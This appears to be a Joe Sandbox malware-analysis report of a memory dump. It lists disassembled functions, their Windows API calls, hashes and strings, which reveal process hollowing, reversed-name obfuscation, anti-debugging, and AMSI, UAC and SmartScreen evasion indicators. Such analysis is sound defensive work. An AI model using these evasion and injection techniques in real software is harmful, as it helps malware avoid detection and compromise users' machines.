API ID: FilePath$AllocCloseCreateNameName_StringWrite
String ID:
API String ID: 3764614163-0
Opcode ID: 20f73391d007380f1fc97f202dff4b57329fcf6eaa15573e8e4458e5284a3bfb
Instruction ID: eea640ababc58e5cf176a1f286ef711e85d4b2741d282ddd483df8766d5e1dbf
Opcode Fuzzy Hash: 20f73391d007380f1fc97f202dff4b57329fcf6eaa15573e8e4458e5284a3bfb
Instruction Fuzzy Hash: 8A21BE71A85608BEEB10EA94DD82FDEB7BDEB08B10F514461B701F71C0DBB46A048B64

Function 02A18788 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62processCOMMON

Download Yara Rule

APIs

Part of subcall function 02A181CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02A1823C,?,?,00000000,?,02A17A7E,ntdll,00000000,00000000,02A17AC3,?,?,00000000), ref: 02A1820A
Part of subcall function 02A181CC: GetModuleHandleA.KERNELBASE(?), ref: 02A1821E

Part of subcall function 02A18274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02A182FC,?,?,00000000,00000000,?,02A18215,00000000,KernelBASE,00000000,00000000,02A1823C), ref: 02A182C1
Part of subcall function 02A18274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02A182C7
Part of subcall function 02A18274: GetProcAddress.KERNEL32(?,?), ref: 02A182D9

CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02A18814

Strings

Kernel32, xrefs: 02A187D3
CreateProcessAsUserW, xrefs: 02A187A1

Memory Dump Source

Source File: 00000004.00000002.1511920634.0000000002A01000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true

Associated: 00000004.00000002.1511899998.0000000002A00000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512091288.0000000002A2E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002A87000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002B7B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002B7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2a00000_x.jbxd

Similarity

API ID: HandleModule$AddressProc$CreateProcessUser
String ID: CreateProcessAsUserW$Kernel32
API String ID: 3130163322-2353454454
Opcode ID: 58a5d7cc95085ddcaa7f76deb69eefd591b9be24e765101b1b0e6dff2aa4d21e
Instruction ID: 32b5337494794b78b24c6b8fc990ee88bb8a88b5bca0884be00253e1ed4afdaa
Opcode Fuzzy Hash: 58a5d7cc95085ddcaa7f76deb69eefd591b9be24e765101b1b0e6dff2aa4d21e
Instruction Fuzzy Hash: 8F1193B6680248BFEB41EEA8DD81F9A77EDFB4C750F514460FA08D7640CA34ED118B65

Function 02A17A2A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52memorynativeCOMMON

Download Yara Rule

APIs

Part of subcall function 02A181CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02A1823C,?,?,00000000,?,02A17A7E,ntdll,00000000,00000000,02A17AC3,?,?,00000000), ref: 02A1820A
Part of subcall function 02A181CC: GetModuleHandleA.KERNELBASE(?), ref: 02A1821E

Part of subcall function 02A18274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02A182FC,?,?,00000000,00000000,?,02A18215,00000000,KernelBASE,00000000,00000000,02A1823C), ref: 02A182C1
Part of subcall function 02A18274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02A182C7
Part of subcall function 02A18274: GetProcAddress.KERNEL32(?,?), ref: 02A182D9

NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02A17A9F

Strings

ntdll, xrefs: 02A17A74
yromeMlautriVetacollAwZ, xrefs: 02A17A47

Memory Dump Source

Source File: 00000004.00000002.1511920634.0000000002A01000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true

Associated: 00000004.00000002.1511899998.0000000002A00000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512091288.0000000002A2E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002A87000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002B7B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002B7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2a00000_x.jbxd

Similarity

API ID: HandleModule$AddressProc$AllocateMemoryVirtual
String ID: ntdll$yromeMlautriVetacollAwZ
API String ID: 4072585319-445027087
Opcode ID: c2ff9359afeb26a13a4c93b097485cedf34ba97ba55d3f6ef267dc644531ba94
Instruction ID: 6526e29b4dba3332fda7f9ff9550f2b78343ea12e747bf95771cda267df008ec
Opcode Fuzzy Hash: c2ff9359afeb26a13a4c93b097485cedf34ba97ba55d3f6ef267dc644531ba94
Instruction Fuzzy Hash: A1110C75680208BFEB04EFA4ED91E9EB7ADFB4C710F504460B900D7680DE34AA108B65

Function 02A17A2C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51memorynativeCOMMON

Download Yara Rule

APIs

Part of subcall function 02A181CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02A1823C,?,?,00000000,?,02A17A7E,ntdll,00000000,00000000,02A17AC3,?,?,00000000), ref: 02A1820A
Part of subcall function 02A181CC: GetModuleHandleA.KERNELBASE(?), ref: 02A1821E

Part of subcall function 02A18274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02A182FC,?,?,00000000,00000000,?,02A18215,00000000,KernelBASE,00000000,00000000,02A1823C), ref: 02A182C1
Part of subcall function 02A18274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02A182C7
Part of subcall function 02A18274: GetProcAddress.KERNEL32(?,?), ref: 02A182D9

NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02A17A9F

Strings

ntdll, xrefs: 02A17A74
yromeMlautriVetacollAwZ, xrefs: 02A17A47

Memory Dump Source

Source File: 00000004.00000002.1511920634.0000000002A01000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true

Associated: 00000004.00000002.1511899998.0000000002A00000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512091288.0000000002A2E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002A87000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002B7B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002B7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2a00000_x.jbxd

Similarity

API ID: HandleModule$AddressProc$AllocateMemoryVirtual
String ID: ntdll$yromeMlautriVetacollAwZ
API String ID: 4072585319-445027087
Opcode ID: 71333b5f99d3bb0192bfd41fe4cf87894a6dd5906ad803cc3b2db4d13fe421ff
Instruction ID: d5e15bb46eadd7af22c8f8216261f4a6f23b758ec8d1e6fc48b29ed251e41fb1
Opcode Fuzzy Hash: 71333b5f99d3bb0192bfd41fe4cf87894a6dd5906ad803cc3b2db4d13fe421ff
Instruction Fuzzy Hash: D1111B79680208BFEB04EFA4ED91E9EB7ADFB4C710F5044A0F900D7680DE34AA108B65

Function 02A18400 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 02A181CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02A1823C,?,?,00000000,?,02A17A7E,ntdll,00000000,00000000,02A17AC3,?,?,00000000), ref: 02A1820A
Part of subcall function 02A181CC: GetModuleHandleA.KERNELBASE(?), ref: 02A1821E

Part of subcall function 02A18274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02A182FC,?,?,00000000,00000000,?,02A18215,00000000,KernelBASE,00000000,00000000,02A1823C), ref: 02A182C1
Part of subcall function 02A18274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02A182C7
Part of subcall function 02A18274: GetProcAddress.KERNEL32(?,?), ref: 02A182D9

NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 02A18471

Strings

yromeMlautriVdaeRtN, xrefs: 02A1841B
ntdll, xrefs: 02A18448

Memory Dump Source

Source File: 00000004.00000002.1511920634.0000000002A01000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true

Associated: 00000004.00000002.1511899998.0000000002A00000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512091288.0000000002A2E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002A87000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002B7B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002B7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2a00000_x.jbxd

Similarity

API ID: HandleModule$AddressProc$MemoryReadVirtual
String ID: ntdll$yromeMlautriVdaeRtN
API String ID: 2521977463-737317276
Opcode ID: 6a3c5ac770331138a4806ebaf3541195fcc6e1ba349afe6eadd4c687034e519a
Instruction ID: dcad0fab2f5f4b4f1de01ef80bd68c114973c2177a847b3e536e60d5b525ac09
Opcode Fuzzy Hash: 6a3c5ac770331138a4806ebaf3541195fcc6e1ba349afe6eadd4c687034e519a
Instruction Fuzzy Hash: 6C01ED79680208BFEB44EFA4ED82E5EB7AEFB4D710F514460F904D7640DE34AD118B65

Function 02A17D78 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 02A181CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02A1823C,?,?,00000000,?,02A17A7E,ntdll,00000000,00000000,02A17AC3,?,?,00000000), ref: 02A1820A
Part of subcall function 02A181CC: GetModuleHandleA.KERNELBASE(?), ref: 02A1821E

Part of subcall function 02A18274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02A182FC,?,?,00000000,00000000,?,02A18215,00000000,KernelBASE,00000000,00000000,02A1823C), ref: 02A182C1
Part of subcall function 02A18274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02A182C7
Part of subcall function 02A18274: GetProcAddress.KERNEL32(?,?), ref: 02A182D9

NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02A17DEC

Strings

yromeMlautriVetirW, xrefs: 02A17D93
Ntdll, xrefs: 02A17DC3

Memory Dump Source

Source File: 00000004.00000002.1511920634.0000000002A01000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true

Associated: 00000004.00000002.1511899998.0000000002A00000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512091288.0000000002A2E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002A87000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002B7B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002B7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2a00000_x.jbxd

Similarity

API ID: HandleModule$AddressProc$MemoryVirtualWrite
String ID: Ntdll$yromeMlautriVetirW
API String ID: 2719805696-3542721025
Opcode ID: 61f90d15f39083d3f3f9233ff0ae3a007b7f2b4859fc63ea9a1f6ee1e7d7afb7
Instruction ID: e879bb324796417049ffc87cfa848500dc1cd5df16fc76ff46cdad1e5d8e0ae0
Opcode Fuzzy Hash: 61f90d15f39083d3f3f9233ff0ae3a007b7f2b4859fc63ea9a1f6ee1e7d7afb7
Instruction Fuzzy Hash: D701C579680208AFEB01EF98ED81E9AB7EDFB49710F505890B904D7680DF34AD118F65

Function 02A18670 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 43nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 02A181CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02A1823C,?,?,00000000,?,02A17A7E,ntdll,00000000,00000000,02A17AC3,?,?,00000000), ref: 02A1820A
Part of subcall function 02A181CC: GetModuleHandleA.KERNELBASE(?), ref: 02A1821E

Part of subcall function 02A18274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02A182FC,?,?,00000000,00000000,?,02A18215,00000000,KernelBASE,00000000,00000000,02A1823C), ref: 02A182C1
Part of subcall function 02A18274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02A182C7
Part of subcall function 02A18274: GetProcAddress.KERNEL32(?,?), ref: 02A182D9

NtUnmapViewOfSection.NTDLL(?,?), ref: 02A186D5

Strings

noitceSfOweiVpamnUtN, xrefs: 02A1868B
ntdll, xrefs: 02A186B8

Memory Dump Source

Source File: 00000004.00000002.1511920634.0000000002A01000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true

Associated: 00000004.00000002.1511899998.0000000002A00000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512091288.0000000002A2E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002A87000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002B7B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002B7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2a00000_x.jbxd

Similarity

API ID: HandleModule$AddressProc$SectionUnmapView
String ID: noitceSfOweiVpamnUtN$ntdll
API String ID: 3503870465-2520021413
Opcode ID: eea43cb38eb3be1625e37796c707e3c124f978851f231115a48312681759710f
Instruction ID: 7904beac6273da5b506ccc1067495408b4fc9f150b201f9a01f75cad2c9e01a5
Opcode Fuzzy Hash: eea43cb38eb3be1625e37796c707e3c124f978851f231115a48312681759710f
Instruction Fuzzy Hash: 00014F78A80204BFEB05EBA4ED91A5EB7AEFB4D750F5148A0F50097640DE38BD018A15

Function 02A1DBB0 Relevance: 4.5, APIs: 3, Instructions: 47filenativeCOMMON

Download Yara Rule

APIs

RtlI.N(?,?,00000000,02A1DC7E), ref: 02A1DC2C
RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,?,?,00000000,02A1DC7E), ref: 02A1DC42
NtDeleteFile.N(?,00000000,?,00000000,00000000,?,?,00000000,02A1DC7E), ref: 02A1DC61

Memory Dump Source

Source File: 00000004.00000002.1511920634.0000000002A01000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true

Associated: 00000004.00000002.1511899998.0000000002A00000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512091288.0000000002A2E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002A87000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002B7B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002B7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2a00000_x.jbxd

Similarity

API ID: Path$DeleteFileNameName_
String ID:
API String ID: 4284456518-0
Opcode ID: 481de8379264354905fd8123789f22b5993fc5e77d5fdc1df1d9e8bbf68ef942
Instruction ID: 46176ed47d94d82c82f3507211821672236dacdc34c24cf292dacaa551948b3c
Opcode Fuzzy Hash: 481de8379264354905fd8123789f22b5993fc5e77d5fdc1df1d9e8bbf68ef942
Instruction Fuzzy Hash: F2016275988A087EEB05DBB0DE81FCD77BDBB44718F5148929301FA081DEB4AB048B24

Function 02A1DC04 Relevance: 4.5, APIs: 3, Instructions: 45filenativeCOMMON

Download Yara Rule

APIs

Part of subcall function 02A04F20: SysAllocStringLen.OLEAUT32(?,?), ref: 02A04F2E

RtlI.N(?,?,00000000,02A1DC7E), ref: 02A1DC2C
RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,?,?,00000000,02A1DC7E), ref: 02A1DC42
NtDeleteFile.N(?,00000000,?,00000000,00000000,?,?,00000000,02A1DC7E), ref: 02A1DC61

Part of subcall function 02A04C60: SysFreeString.OLEAUT32(02A1F4A4), ref: 02A04C6E

Memory Dump Source

Source File: 00000004.00000002.1511920634.0000000002A01000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true

Associated: 00000004.00000002.1511899998.0000000002A00000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512091288.0000000002A2E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002A87000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002B7B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002B7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2a00000_x.jbxd

Similarity

API ID: PathString$AllocDeleteFileFreeNameName_
String ID:
API String ID: 1530111750-0
Opcode ID: e880bc63af2b495ba51dc86ba0bdb09b0a3febd13d55a03b39400b79d0c13005
Instruction ID: 3fefe999275dc5ddb01aa0f1c5f4f8d8096d22a2794c4d114354a2a8ddd2b0e6
Opcode Fuzzy Hash: e880bc63af2b495ba51dc86ba0bdb09b0a3febd13d55a03b39400b79d0c13005
Instruction Fuzzy Hash: 6701F47198460CBEEB11EBA0DE82FCDB3BDEB48714F5144A1E701F6580EE746B048A64

Function 02A16DC8 Relevance: 1.5, APIs: 1, Instructions: 48comCOMMON

Download Yara Rule

APIs

Part of subcall function 02A16D6C: CLSIDFromProgID.OLE32(00000000,?,00000000,02A16DB9,?,?,?,00000000), ref: 02A16D99

CoCreateInstance.OLE32(?,00000000,00000005,02A16EAC,00000000,00000000,02A16E2B,?,00000000,02A16E9B), ref: 02A16E17

Memory Dump Source

Source File: 00000004.00000002.1511920634.0000000002A01000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true

Associated: 00000004.00000002.1511899998.0000000002A00000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512091288.0000000002A2E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002A87000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002B7B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002B7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2a00000_x.jbxd

Similarity

API ID: CreateFromInstanceProg
String ID:
API String ID: 2151042543-0
Opcode ID: 1f53af5818c713b7209c0596f3056ef9e8b6d019a054c207f166e2ba6a56d160
Instruction ID: fd257d5b797ac069281d994f9e4e096ba4b6873851edc3bccfe6c288b4f6c39f
Opcode Fuzzy Hash: 1f53af5818c713b7209c0596f3056ef9e8b6d019a054c207f166e2ba6a56d160
Instruction Fuzzy Hash: 7B01DF31648B04AEEB11EF61DDA296BBBBDE749F20B510935F405E26C0EE319910CC60

Function 02A1F7C8 Relevance: 227.8, APIs: 8, Strings: 117, Instructions: 9071COMMON

Download Yara Rule

APIs

InetIsOffline.URL(00000000,00000000,02A2B784,?,?,?,00000000,00000000), ref: 02A1F801

Part of subcall function 02A189D0: FreeLibrary.KERNEL32(75280000,00000000,00000000,00000000,00000000,02A8738C,Function_0000662C,00000004,02A8739C,02A8738C,05F5E103,00000040,02A873A0,75280000,00000000,00000000), ref: 02A18AAA

Part of subcall function 02A1F6E8: GetModuleHandleW.KERNEL32(KernelBase,?,02A1FAEB,UacInitialize,02A87380,02A2B7B8,OpenSession,02A87380,02A2B7B8,ScanBuffer,02A87380,02A2B7B8,ScanString,02A87380,02A2B7B8,Initialize), ref: 02A1F6EE
Part of subcall function 02A1F6E8: GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 02A1F700

Part of subcall function 02A1F744: GetModuleHandleW.KERNEL32(KernelBase), ref: 02A1F754
Part of subcall function 02A1F744: GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 02A1F766
Part of subcall function 02A1F744: CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 02A1F77D

Part of subcall function 02A07E5C: GetFileAttributesA.KERNEL32(00000000,?,02A2041F,ScanString,02A87380,02A2B7B8,OpenSession,02A87380,02A2B7B8,ScanString,02A87380,02A2B7B8,UacScan,02A87380,02A2B7B8,UacInitialize), ref: 02A07E67

Part of subcall function 02A0C364: GetModuleFileNameA.KERNEL32(00000000,?,00000105,02B7B8B8,?,02A20751,ScanBuffer,02A87380,02A2B7B8,OpenSession,02A87380,02A2B7B8,ScanBuffer,02A87380,02A2B7B8,OpenSession), ref: 02A0C37B

Part of subcall function 02A1DD70: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02A1DE40), ref: 02A1DDAB
Part of subcall function 02A1DD70: NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,02A1DE40), ref: 02A1DDDB
Part of subcall function 02A1DD70: NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 02A1DDF0
Part of subcall function 02A1DD70: NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 02A1DE1C
Part of subcall function 02A1DD70: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 02A1DE25

Part of subcall function 02A07E80: GetFileAttributesA.KERNEL32(00000000,?,02A2356F,ScanString,02A87380,02A2B7B8,OpenSession,02A87380,02A2B7B8,ScanBuffer,02A87380,02A2B7B8,OpenSession,02A87380,02A2B7B8,Initialize), ref: 02A07E8B

Part of subcall function 02A08048: CreateDirectoryA.KERNEL32(00000000,00000000,?,02A2370D,OpenSession,02A87380,02A2B7B8,ScanString,02A87380,02A2B7B8,Initialize,02A87380,02A2B7B8,ScanString,02A87380,02A2B7B8), ref: 02A08055

Strings

GetProxyDllInfo, xrefs: 02A1FB2A
NtSetSecurityObject, xrefs: 02A29276
C:\\Windows\\System32\\esentutl.exe /y , xrefs: 02A264AA
smartscreenps, xrefs: 02A20051, 02A20084, 02A200B7
sppwmi, xrefs: 02A2ADFC
NtQueryInformationThread, xrefs: 02A2AEE4
NtAccessCheck, xrefs: 02A2B016
C:\Users\Public\, xrefs: 02A25D88, 02A26FF3
ScanBuffer, xrefs: 02A1F9C6, 02A1FD1E, 02A1FF48, 02A204AF, 02A205BC, 02A206D4, 02A20AA8, 02A20C46, 02A20DEC, 02A20F0C, 02A210A1, 02A21199, 02A21402, 02A215A8, 02A21744, 02A2185A, 02A218E8, 02A21BFC, 02A21E9D, 02A21FAE, 02A2214B, 02A224F6, 02A22602, 02A22820, 02A2293D, 02A22C58, 02A22CF9, 02A22E6D, 02A2302D, 02A2334F, 02A23719, 02A239B8, 02A23ABA, 02A256B0, 02A259EA, 02A25D03, 02A26083, 02A263BC, 02A26666, 02A2686B, 02A269D1, 02A26B45, 02A26BC1, 02A27764, 02A277F5, 02A27C25, 02A27DB8, 02A27F14, 02A2800C, 02A28529, 02A287F6, 02A2899C, 02A28B29, 02A28CBD, 02A28E3C, 02A290B3, 02A291AB, 02A295C7, 02A298A0, 02A29A39, 02A29C6F, 02A29D01, 02A2A039, 02A2A3D7, 02A2A906, 02A2B20C
NtMapViewOfSection, xrefs: 02A2AF7D
NtDeviceIoControlFile, xrefs: 02A2A985
mssip32, xrefs: 02A1FDAB, 02A1FDDE, 02A1FE11, 02A2A192
DllRegisterServer, xrefs: 02A1FB54, 02A200A0
UacScan, xrefs: 02A1F836, 02A200D9, 02A201D1, 02A207A0, 02A21386, 02A21964, 02A222C6, 02A229D9, 02A23C2E, 02A25B8F, 02A260FF, 02A262C4, 02A265EA, 02A266F7, 02A26955, 02A26A4D, 02A275F0, 02A27992, 02A27BA9, 02A27D3C, 02A27F90, 02A2841C, 02A285A5, 02A286FE, 02A288A4, 02A28A31, 02A28BC5, 02A28D44, 02A28FBB, 02A29429, 02A29643, 02A29824, 02A299BD, 02A29BF3, 02A2AA63
DllGetClassObject, xrefs: 02A1FB03, 02A2003A, 02A2A115, 02A2ADE5
SLGatherMigrationBlob, xrefs: 02A2AE18
RtlQueryProcessDebugInformation, xrefs: 02A2A9A3
Advapi, xrefs: 02A2A9B7, 02A2A9C6, 02A2A9D5, 02A2A9E4, 02A2AA20, 02A2AA2F, 02A2AA3E
CreateProcessW, xrefs: 02A2AA0C
GZmMS1j, xrefs: 02A1F80F
DlpNotifyPreDragDrop, xrefs: 02A2A44D
wintrust, xrefs: 02A1FC1A, 02A1FC4D, 02A1FC80
EnumServicesStatusExA, xrefs: 02A2A9D0
tquery, xrefs: 02A2A0C6
LdrGetProcedureAddress, xrefs: 02A2B07C
GET, xrefs: 02A22455
/d , xrefs: 02A264B5
bcrypt, xrefs: 02A1FEC0, 02A1FEF3, 02A1FF26, 02A2A2BD
BCryptQueryProviderRegistration, xrefs: 02A1FEDC
EnumServicesStatusA, xrefs: 02A2A9B2
NtOpenObjectAuditAlarm, xrefs: 02A29226
DlpCheckIsCloudSyncApp, xrefs: 02A2A480
NtQueryDirectoryFile, xrefs: 02A2A994
.url, xrefs: 02A25D93
acS, xrefs: 02A23D02
NtQuerySystemInformation, xrefs: 02A2A976
EnumServicesStatusW, xrefs: 02A2A9C1
NtWriteVirtualMemory, xrefs: 02A2B0AF
SLGetGenuineInformation, xrefs: 02A29E6F
NtQueryVirtualMemory, xrefs: 02A2AEB1
advapi32, xrefs: 02A2923F
CreateProcessA, xrefs: 02A2A9FD
Kernel32, xrefs: 02A2AA02, 02A2AA11, 02A2AA4D
MZP, xrefs: 02A29992
CryptSIPVerifyIndirectData, xrefs: 02A1FDC7, 02A2A17B
C:\Windows\System32\, xrefs: 02A2040A, 02A2796B, 02A286B3
SLIsGenuineLocalEx, xrefs: 02A29ED5
CryptSIPGetSignedDataMsg, xrefs: 02A1FDFA
NtCreateSection, xrefs: 02A2AF4A
DlpGetArchiveFileTraceInfo, xrefs: 02A2A4B3
URL=file:", xrefs: 02A26D57
CreateProcessAsUserW, xrefs: 02A2AA2A, 02A2AA48
EnumProcessModules, xrefs: 02A2A9EE
endpointdlp, xrefs: 02A2A464, 02A2A497, 02A2A4CA, 02A2A4FD
Initialize, xrefs: 02A1F8FE, 02A2081C, 02A209B0, 02A20B4E, 02A20CF4, 02A20FA9, 02A2164C, 02A21A88, 02A21F32, 02A2203C, 02A22723, 02A22A55, 02A22D75, 02A230A9, 02A23257, 02A23583, 02A2393C, 02A25876, 02A25C0B, 02A26007, 02A261CC, 02A26438, 02A2656E, 02A26773, 02A276E8, 02A283A0, 02A293AD, 02A29FBD, 02A2A35B, 02A2A88A, 02A2AC44, 02A2B190
OpenProcess, xrefs: 02A2AB72
OpenSession, xrefs: 02A1F89A, 02A1FA2A, 02A20312, 02A20433, 02A20540, 02A20658, 02A20A2C, 02A20BCA, 02A20D70, 02A20E90, 02A21025, 02A2111D, 02A2130A, 02A214B0, 02A217DE, 02A21A0C, 02A21B80, 02A21CA3, 02A21E21, 02A221C7, 02A2224A, 02A22362, 02A2247A, 02A22586, 02A227A4, 02A228C1, 02A22B60, 02A22BDC, 02A22DF1, 02A22F91, 02A232D3, 02A23461, 02A2367B, 02A23795, 02A23B36, 02A25634, 02A257CE, 02A2596E, 02A25B13, 02A25C87, 02A25ED7, 02A25F8B, 02A26248, 02A26340, 02A267EF, 02A26AC9, 02A26C3D, 02A26DD3, 02A26F83, 02A2766C, 02A27871, 02A27A8A, 02A27B2D, 02A27CC0, 02A28088, 02A28324, 02A28621, 02A2877A, 02A28920, 02A28AAD, 02A28C41, 02A28DC0, 02A28EC3, 02A29037, 02A292B5, 02A294A5, 02A29796, 02A2991C, 02A29B77, 02A29D7D, 02A29F41, 02A2A230, 02A2A2DF, 02A2A51F, 02A2A716, 02A2A80E, 02A2ACC0, 02A2B288
UacInitialize, xrefs: 02A1FA8E, 02A20155, 02A20898, 02A2553C, 02A258F2, 02A25DDF, 02A278ED, 02A2912F, 02A2954B
SetUnhandledExceptionFilter, xrefs: 02A2AC0B
I_QueryTagInformation, xrefs: 02A2923A
NtQuerySecurityObject, xrefs: 02A2AFE3
GetProcessMemoryInfo, xrefs: 02A2A148
MiniDumpWriteDump, xrefs: 02A2924E
SxTracerGetThreadContextDebug, xrefs: 02A2A0E2, 02A2ADB2
EtwEventWrite, xrefs: 02A2B148
sppc, xrefs: 02A29E86, 02A29EB9, 02A29EEC, 02A29F1F, 02A2AE2F, 02A2AE62
